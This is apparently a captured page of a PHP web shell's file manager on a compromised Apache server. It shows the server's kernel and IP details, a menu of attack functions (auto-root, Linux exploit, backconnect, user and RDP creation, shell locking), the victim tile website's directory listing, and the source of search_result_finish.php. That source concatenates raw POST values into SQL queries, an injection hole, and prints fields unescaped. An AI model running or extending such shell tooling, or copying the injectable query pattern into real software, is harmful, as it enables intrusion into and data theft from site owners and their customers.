Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxr-xr-x
videos
[ DIR ]
drwxr-xr-x
.htaccess
844
B
-rw-r--r--
-----index.html
4.76
KB
-rw-rw-r--
---catalogue.php
74.37
KB
-rw-r--r--
360.php
15.2
KB
-rw-r--r--
73766.jpg
997.9
KB
-rw-r--r--
Cart.class.php
6.98
KB
-rw-r--r--
about-us.php
32.79
KB
-rw-r--r--
add_cart.php
325
B
-rw-r--r--
aj_get_color_test2.php
29.86
KB
-rw-r--r--
aj_get_finish_test2.php
29.31
KB
-rw-r--r--
aj_get_size_test.php
32.16
KB
-rw-r--r--
aj_more_post.php
9.05
KB
-rw-r--r--
aj_more_post_finish.php
8.56
KB
-rw-r--r--
annual-retuns.php
11.32
KB
-rw-r--r--
blog-post.php
13.56
KB
-rw-r--r--
blog.php
6.47
KB
-rw-r--r--
builder.php
36.27
KB
-rw-r--r--
career.php
26.97
KB
-rw-r--r--
cart.php
6.65
KB
-rw-r--r--
catalogue.php
81.01
KB
-rw-r--r--
certifications.php
43.86
KB
-rw-r--r--
clear_cart.php
142
B
-rw-r--r--
composer.json
70
B
-rw-r--r--
composer.lock
15.78
KB
-rw-r--r--
csr.php
33.49
KB
-rw-r--r--
dealer-1.php
27.75
KB
-rw-r--r--
dealer.php
84.36
KB
-rw-r--r--
dealerbkp.php
55.94
KB
-rw-r--r--
delete_item.php
394
B
-rw-r--r--
design_by_italy.php
14.43
KB
-rw-r--r--
event_details.php
6.45
KB
-rw-r--r--
fetch_collection.php
846
B
-rw-r--r--
fetch_finish.php
904
B
-rw-r--r--
fetch_sizes.php
906
B
-rw-r--r--
fetch_surfaces.php
812
B
-rw-r--r--
fpdf.css
1.31
KB
-rw-r--r--
fpdf.php
49.65
KB
-rw-r--r--
generate_pdf.php
2.78
KB
-rw-r--r--
global-export.php
101.88
KB
-rw-r--r--
global-market-1.php
17.76
KB
-rw-r--r--
id-mapping.json
16.73
KB
-rw-r--r--
index.php
129.78
KB
-rw-r--r--
interior-architecture-2.php
59
KB
-rw-r--r--
interior-architecture.php
67.44
KB
-rw-r--r--
landing_page.html
9.74
KB
-rw-r--r--
located-us.php
34.96
KB
-rw-r--r--
manufacturer-and-supplier.php
73.38
KB
-rw-r--r--
milestones.php
15.72
KB
-rw-r--r--
news-play.php
6.62
KB
-rw-r--r--
product-detail-2.php
41.38
KB
-rw-r--r--
product-detail.php
38.5
KB
-rw-r--r--
product-list-back.php
33.34
KB
-rw-r--r--
product-list.php
37.42
KB
-rw-r--r--
product-search.php
28.81
KB
-rw-r--r--
promoter-profile.php
8.8
KB
-rw-r--r--
robots.txt
99
B
-rw-r--r--
save_cart.php
269
B
-rw-r--r--
search_result_all.php
8.51
KB
-rw-r--r--
search_result_application.php
6.78
KB
-rw-r--r--
search_result_color.php
8.93
KB
-rw-r--r--
search_result_finish.php
8.87
KB
-rw-r--r--
search_result_size.php
7.24
KB
-rw-r--r--
server-smtp.php
3.3
KB
-rw-r--r--
server.php
1.19
KB
-rw-r--r--
showroom.php
2.19
KB
-rw-r--r--
sitemap.xml
60.69
KB
-rw-r--r--
tiles-calculator.php
25.23
KB
-rw-r--r--
view_cart.php
3.17
KB
-rw-r--r--
volume.php
47.04
KB
-rw-r--r--
volume_bkp.php
35.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search_result_finish.php
<?php include('admin/module/obops.php'); //Database Connection if (isset($_POST['finish_id'])) { $sel_query = "SELECT * from tbl_new_products prod, tbl_collection col where prod.collection_id = col.collection_id AND prod.size_id = '" . $_POST['size_id'] . "' and prod.finish_id = '" . $_POST['finish_id'] . "' order by prod_image desc LIMIT 20"; } $result = mysqli_query($conn, $sel_query); $numofrows = mysqli_num_rows($result); if ($numofrows > 0) { ?> <?php while ($prod = mysqli_fetch_assoc($result)) { $sel_collection = "SELECT * from tbl_collection where `collection_id` = '" . $prod['collection_id'] . "'"; $collection = mysqli_query($conn, $sel_collection); $collection_name = mysqli_fetch_assoc($collection); $sel_size = "SELECT * from tbl_collection where `collection_id` = '" . $prod['size_id'] . "'"; $size = mysqli_query($conn, $sel_size); $size_name = mysqli_fetch_assoc($size); $sel_finish = "SELECT * from tbl_collection where `collection_id` = '" . $prod['finish_id'] . "'"; $finishname = mysqli_query($conn, $sel_finish); $finish = mysqli_fetch_assoc($finishname); ?> <style> .new-size-product { max-height: 180px; object-fit: cover; width: 100vw !important; } </style> <article class="qodef-e qodef-grid-item qodef-item--full post-912 portfolio-item type-portfolio-item status-publish has-post-thumbnail hentry portfolio-category-landscaping portfolio-tag-conceptual portfolio-tag-exhibition"> <div class="qodef-e-inner"> <div class="qodef-e-image"> <div class="qodef-e-media-image"> <a itemprop="url" href="product-detail-2.php?pid=<?= $prod['prod_id']; ?>&series=<?= $prod['old_series_id']; ?>&name=<?= $prod['prod_title']; ?>" target="_self"> <?php if ($prod['border'] == 'Yes') { ?> <img fetchpriority="high" decoding="async" width="1100" height="728" src="uploads/products/<?= $prod['prod_image2']; ?>" class="attachment-full size-full wp-post-image new-size-product" alt="z" srcset="uploads/products/<?= $prod['prod_image2']; ?>" sizes="(max-width: 1100px) 100vw, 1100px" style="border:1px solid #ddd;" /> <?php } else { ?> <img fetchpriority="high" decoding="async" width="1100" height="728" src="uploads/products/<?= $prod['prod_image2']; ?>" class="attachment-full size-full wp-post-image new-size-product" alt="z" srcset="uploads/products/<?= $prod['prod_image2']; ?>" sizes="(max-width: 1100px) 100vw, 1100px" /> <?php } ?> </a> </div> </div> <?php if ($prod['prod_image'] != '') { ?> <div class="qodef-e-image-hover"> <div class="qodef-e-media-image-hover"> <a itemprop="url" href="product-detail-2.php?pid=<?= $prod['prod_id']; ?>&series=<?= $prod['old_series_id']; ?>&name=<?= $prod['prod_title']; ?>" target="_self"> <img decoding="async" width="1100" height="728" src="uploads/products/<?= $prod['prod_image']; ?>" class="attachment-full size-full" alt="z" srcset="uploads/products/<?= $prod['prod_image']; ?>" sizes="(max-width: 1100px) 100vw, 1100px" /> </a> </div> </div> <?php } else { ?> <div class="qodef-e-image-hover"> <div class="qodef-e-media-image-hover"> <a itemprop="url" href="product-detail-2.php?pid=<?= $prod['prod_id']; ?>&series=<?= $prod['old_series_id']; ?>&name=<?= $prod['prod_title']; ?>" target="_self"> <img decoding="async" width="1100" height="728" src="uploads/products/<?= $prod['prod_image2']; ?>" class="attachment-full size-full" alt="z" srcset="uploads/products/<?= $prod['prod_image2']; ?>" sizes="(max-width: 1100px) 100vw, 1100px" /> </a> </div> </div> <?php } ?> <div class="qodef-e-content" style="margin:24px 0 30px 0px"> <div class="qodef-e-text"> <h5 itemprop="name" class="qodef-e-title entry-title"> <a itemprop="url" class="qodef-e-title-link" href="product-detail-2.php?pid=<?= $prod['prod_id']; ?>&series=<?= $prod['old_series_id']; ?>&name=<?= $prod['prod_title']; ?>" target="_self"> <?= $prod['prod_name']; ?> </a> </h5> </div> <!-- <div class="qodef-e-top-holder"> <div class="qodef-e-info"> <?php $sql = "SELECT count(size_id) as amount_sum from tbl_new_products WHERE old_series_id = '" . $prod['old_series_id'] . "' group by size_id asc"; $cres = mysqli_query($conn, $sql); $cdata = mysqli_fetch_array($cres); ?> <a href="#" rel="tag"><?= $cdata["amount_sum"]; ?> sizes</a> <span class="qodef-info-separator-single"></span> <?php $sql = "SELECT count(finish_id) as amount_sum from tbl_new_products WHERE old_series_id = '" . $prod['old_series_id'] . "' "; $cres = mysqli_query($conn, $sql); $cdata = mysqli_fetch_array($cres); ?> <a href="#" rel="tag"><?= $cdata["amount_sum"]; ?> finishes</a> <span class="qodef-info-separator-single"></span> <?php $sql = "SELECT count(color) as amount_sum from tbl_new_products WHERE old_series_id = '" . $prod['old_series_id'] . "' "; $cres = mysqli_query($conn, $sql); $cdata = mysqli_fetch_array($cres); ?> <a href="#" rel="tag"><?= $cdata["amount_sum"]; ?> Colors</a> <div class="qodef-info-separator-end"></div> </div> </div> --> </div> </div> <input type="hidden" name="c_id" id="c_id" value="<?= $prod['size_id']; ?>"> <input type="hidden" name="s_id" id="s_id" value="<?= $prod['size_id']; ?>"> </article> <?php } ?> <?php if (isset($prod_id)) { ?> <div class="row" style="text-align: center;"> <div class="show_more_container_finish" id="show_more_container_finish<?php echo $prod_id; ?>"></div> <div class="col-md-12" style="text-align: center;"> <span id="<?php echo $prod_id; ?>" class="show_more_finish" title="Load more Products"> <div class="portfolio-button wow fadeInUp m-auto pt-45"> <ul class="pagination"> <button class="flat-button border-radius-none style-haft bg-white border-black margin-left-17">View search finish</button> </ul> <!-- <a class="btn">Show more <img class="pl-15" src="img/icons/rotate-icon-2.png" alt="rotate"></a> --> </div> </span> </div> </div> <?php } else { } ?> <?php } else { ?> <div class="col-md-12"> <div class="section-title title-left text-left headline" style="padding-bottom: 20px;"> <h2 class="color-black">No Records found</h2> </div> </div> <?php } ?>
Close